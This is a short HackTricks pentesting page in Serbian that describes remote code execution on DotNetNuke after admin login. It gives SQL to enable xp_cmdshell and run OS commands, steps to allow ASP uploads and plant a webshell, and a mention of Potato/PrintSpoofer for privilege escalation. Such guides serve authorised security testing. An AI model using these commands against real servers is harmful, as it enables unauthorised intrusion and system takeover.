DotNetNuke (DNN)
Reading time: 2 minutes
tip
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
DotNetNuke (DNN)
Ako se prijavite kao administrator u DNN, lako je dobiti RCE.
RCE
Putem SQL-a
SQL konzola je dostupna na stranici Settings
gde možete omogućiti xp_cmdshell
i izvršiti komande operativnog sistema.
Koristite ove linije da omogućite xp_cmdshell
:
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
I pritisnite "Run Script" da pokrenete te sQL rečenice.
Zatim, koristite nešto poput sledećeg da pokrenete OS komande:
xp_cmdshell 'whoami'
Putem ASP webshell-a
U Settings -> Security -> More -> More Security Settings
možete dodati nove dozvoljene ekstenzije pod Allowable File Extensions
, a zatim kliknuti na dugme Save
.
Dodajte asp
ili aspx
i zatim u /admin/file-management
otpremite asp webshell nazvan shell.asp
, na primer.
Zatim pristupite /Portals/0/shell.asp
da biste pristupili svom webshell-u.
Eskalacija privilegija
Možete eskalirati privilegije koristeći Potatoes ili PrintSpoofer, na primer.
tip
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.